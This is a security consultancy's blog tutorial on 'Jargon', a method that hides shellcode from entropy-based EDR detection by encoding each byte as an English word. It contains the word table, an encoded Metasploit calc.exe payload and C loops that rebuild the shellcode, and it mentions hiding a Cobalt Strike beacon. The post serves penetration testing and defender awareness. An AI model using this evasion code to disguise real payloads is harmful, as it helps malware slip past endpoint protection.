Obfuscating Shellcode Using Jargon

By Red Siege | July 31, 2023

by Mike Saunders, Principal Security Consultant

In a recent blog, we discussed how encrypting shellcode increases entropy, which may cause your shellcode loader to be blocked or detected. In this blog, we’ll discuss a new technique for hiding your shellcode and evading entropy checks at the same time.

More entropy check evasion

As we discussed in the previous blog, as testers, we need to obfuscate our shellcode to evade EDRs that measure entropy as a means of determining whether a binary is trustworthy. We typically hide our shellcode by encrypting it, which increases entropy. After evading CrowdStrike by compiling in an array of words to lower entropy, I started to wonder whether it was possible to have a shellcode loader that contained no shellcode and didn’t have to load shellcode from an external file or website.

While contemplating how to accomplish this, I started thinking about what shellcode is. Shellcode is a sequence of bytes that is interpreted as machine code instructions. We typically write shellcode using hex bytes. With the help of friends and the BloodHoundGang Slack, I realized that while we typically write shellcode bytes in hex, we could just as easily write them as ints. Confused? Allow me to explain.

A quick diversion about hex

Hexadecimal, or base-16, is a numbering system in which each digit represents four bits of data using one of sixteen possible symbols: “0”-“9” and “A”-“F”. A single byte consists of two four-bit values, for a total of 8 bits. Since each of the four-bit values that make up our 8-bit byte can be represented by one of the sixteen possible symbols, a single byte can take one of 256 possible values (16 x 16 = 256). We would represent this set of possible values as “00” to “FF”.

There isn’t a magical meaning to using hex. We use it because it’s easier than writing binary strings. To the computer, though, a hex literal is just another way of writing an integer. As a result, instead of writing shellcode in hex, we could use the integer values 0 – 255.

Back to your regularly-scheduled programming

As we now know: encryption increases entropy => high entropy can lead to detection => adding a bunch of words to our payload decreases entropy. How do we use this to our advantage?

We know we typically write shellcode using hex byte sequences, and we know that each byte in a given sequence contains one of only 256 possible values: “00”-“FF”. If we had a set of 256 unique words, we could map each byte value to a specific word: 0x00 to “vision”, 0x01 to “chairs”, and so on. We can put all of our words into an array of strings, where each word’s position in the array represents its byte value.

const char* translation_table[256] = { "vision","chairs","topics","meditation","piano","moving","terror","kinds","crops","salmon","divide","provinces","appeal","hypothesis","martha","socks","joshua","rabbit","stewart","surfaces","moral","remark","specific","specification","bloggers","escort","enough","personality","induction","arise","homeless","farmers","reasonable","shorter","partners","compensation","earning","execute","gateway","affecting","yours","headphones","zones","genesis","trash","gathered","insight","studied","variations","dispatch","objectives","butterfly","variables","vaccine","sunset","earnings","elections","negotiations","murray","result","renewal","proposed","meets","favor","resume","review","coach","directors","accounting","personalized","started","contracts","readers","fallen","exploring","vampire","findarticles","webpage","sending","bargain","hindu","academics","pentium","intermediate","promise","acres","researcher","picture","sheet","eight","phase","inspector","interests","islands","lifestyle","outlined","logged","toolbox","relation","verify","mambo","shadows","rising","joining","publicity","sympathy","tattoo","sunny","opinions","walking","chicken","retrieval","ghost","groups","struct","womens","mention","interface","terrain","plans","output","shadow","double","consistent","competitions","identifying","newspapers","democrat","compare","postings","understand","marco","ozone","hundred","associate","milwaukee","barbados","hotmail","hoped","closest","financing","shopzilla","cookbook","clinton","bibliographic","troubleshooting","keeps","pilot","worried","wanna","francisco","lewis","tough","extreme","respiratory","measuring","republic","robinson","daisy","louisiana","notion","workout","rehab","graham","leslie","kennedy","posing","google","profession","rider","jenny","against","theories","creative","technique","darwin","roster","samba","organic","russia","redeem","determination","neighbors","occupation","towards","expedia","panic","showtimes","spread","genes","patch","healing","eagles","worcester","adequate","components","riding","utils","yahoo","calcium","sports","ethiopia","iraqi","procurement","diego","liverpool","retired","tunnel","sealed","presentations","holdings","budget","witness","effectively","codes","supplier","disks","collectables","manga","dependent","managers","inherited","occasional","distributions","ratio","worst","while","wikipedia","dublin","assisted","allow","ecommerce","accredited","dating","smith","maximum","suffer","sufficiently","kenneth","prayer","widescreen","oriented","situation","ensuring","trail","prevention","kitty","simulation","domain","corrections","parental","properly","pearl","kevin","every","ethernet" };

Now that we have our translation table, we can iterate over the bytes in our shellcode and look up each one in the table to find the corresponding word. If our shellcode byte is “0x00”, in the above example we’ll look for the word at position 0, which is “vision.” If our byte is “0xFF”, we’ll grab the word at index 255 (the 256th and last position), which is “ethernet.” At this point, we’ve translated our shellcode into an array of words. Depending on the size of our shellcode, this can be quite a large array. The following array is the translated shellcode for a Metasploit windows/x64/exec payload designed to pop calc.exe:

const char* translated_shellcode[275] = { "pearl","readers","marco","dublin","widescreen","accredited","eagles","vision","vision","vision","review","academics","review","hindu","pentium","academics","researcher","readers","dispatch","holdings","shadows","readers","closest","pentium","logged","readers","closest","pentium","bloggers","readers","closest","pentium","reasonable","readers","closest","struct","hindu","readers","socks","occupation","exploring","exploring","webpage","dispatch","ethiopia","readers","dispatch","eagles","theories","renewal","toolbox","competitions","topics","trash","reasonable","review","worcester","ethiopia","hypothesis","review","chairs","worcester","while","sufficiently","pentium","review","academics","readers","closest","pentium","reasonable","closest","coach","renewal","readers","chairs","sealed","closest","compare","barbados","vision","vision","vision","readers","hundred","eagles","mention","joining","readers","chairs","sealed","hindu","closest","readers","bloggers","accounting","closest","resume","reasonable","fallen","chairs","sealed","wikipedia","researcher","readers","ethernet","ethiopia","review","closest","variables","barbados","readers","chairs","codes","webpage","dispatch","ethiopia","readers","dispatch","eagles","theories","review","worcester","ethiopia","hypothesis","review","chairs","worcester","elections","ratio","interface","oriented","findarticles","meditation","findarticles","earning","crops","personalized","negotiations","presentations","interface","disks","sheet","accounting","closest","resume","earning","fallen","chairs","sealed","rising","review","closest","appeal","readers","accounting","closest","resume","induction","fallen","chairs","sealed","review","closest","piano","barbados","readers","chairs","sealed","review","sheet","review","sheet","lifestyle","eight","phase","review","sheet","review","eight","review","phase","readers","marco","suffer","reasonable","review","pentium","ethernet","ratio","sheet","review","eight","phase","readers","closest","stewart","dating","picture","ethernet","ethernet","ethernet","islands","readers","panic","chairs","vision","vision","vision","vision","vision","vision","vision","readers","shopzilla","shopzilla","chairs","chairs","vision","vision","review","panic","dispatch","closest","retrieval","milwaukee","ethernet","effectively","showtimes","widescreen","determination","rehab","researcher","review","panic","posing","wanna","genes","robinson","ethernet","effectively","readers","marco","riding","yours","renewal","terror","competitions","divide","compare","properly","ratio","interface","moving","showtimes","contracts","surfaces","struct","retrieval","tattoo","vision","eight","review","hotmail","manga","ethernet","effectively","verify","walking","mambo","insight","shadows","output","shadows","vision" };

We can place our translation table and our translated shellcode in our shellcode loader. We’ll need to use a couple of for loops to translate our shellcode words back into actual shellcode. In the example below, in the outer loop, we iterate over each word in our translated_shellcode character array. In the inner loop, we perform a lookup in our translation table to recover the value. In the example above, the first word is “pearl.” Looking in our translation table, we find pearl is at translation_table[252], so we insert 252 into shellcode[0]. The second word is “readers”. Our lookup will find that this word is at translation_table[72], so we insert a 72 into shellcode[1]. We repeat this process until we’ve completely reconstructed our shellcode.

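unsigned char shellcode[275];

// Requires <string.h> for strcmp.
for (int sc_index = 0; sc_index < 275; sc_index++) {    // 275 words: indexes 0 through 274
    for (int tt_index = 0; tt_index <= 255; tt_index++) {
        // Compare string contents rather than pointer values; identical
        // literals are not guaranteed to share an address.
        if (strcmp((const char *)translation_table[tt_index], translated_shellcode[sc_index]) == 0) {
            shellcode[sc_index] = (unsigned char)tt_index;
            break;
        }
    }
}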

Putting it all together

I’ve released Jargon, a generator written in Python. Jargon will translate raw shellcode and generate a stub that can be plugged into your favorite C shellcode loader. A constructed Jargon payload will not contain any “shellcode bytes” as we typically think of them. Because we’re using words to represent the shellcode, we also decrease the entropy in our payload and evade entropy checks. In the example below, I used Jargon to obfuscate a Cobalt Strike beacon.

Detection

For the defenders, I’m not sure there’s an easy way to detect the use of Jargon obfuscation. It might be possible to determine the nature of the character arrays through frequency analysis, but this is outside my wheelhouse.

Conclusion

There are many ways to obfuscate shellcode and also reduce entropy. Jargon demonstrates one of them. While it does help solve the entropy detection problem, it does not, by itself, lead to an EDR bypass. You will still need to use evasive methods to copy the reconstructed shellcode into memory and execute it.

Credits

I am not the first person to come up with this technique. I did quite a bit of searching and I couldn’t find any examples of prior art, although I did find others using this technique during my research. As far as I know, when I originally wrote Jargon, I was the first person to publish code for it. There are examples of prior art using the English language for shellcode, but in a different manner, such as Mason et al., CCS, 2009. There is also the work of Hadrien Barral and Georges-Axel Jaloyan, presented at DEF CON 30, in which they use emoji to represent shellcode. Many thanks to Charlie Clark for pointing me to Vincent Dary’s PolyAsciiShellGen project, which demonstrates another method of shellcode obfuscation, this time using the printable ASCII character set.

Extra Credit

You may have already figured this out, but it’s possible to do this without even using a decimal value. We can index arrays using either a decimal literal or a hex literal; both are just integers to the compiler. Therefore, we could rewrite our for loop as follows:

unsigned char shellcode[275];
for (int sc_index = 0x00; sc_index < 0x0113; sc_index++) {    // 0x0113 == 275
    for (int tt_index = 0x00; tt_index <= 0xFF; tt_index++) {
        // strcmp (from <string.h>) compares string contents, not pointer values
        if (strcmp((const char *)translation_table[tt_index], translated_shellcode[sc_index]) == 0) {
            shellcode[sc_index] = (unsigned char)tt_index;
            break;
        }
    }
}

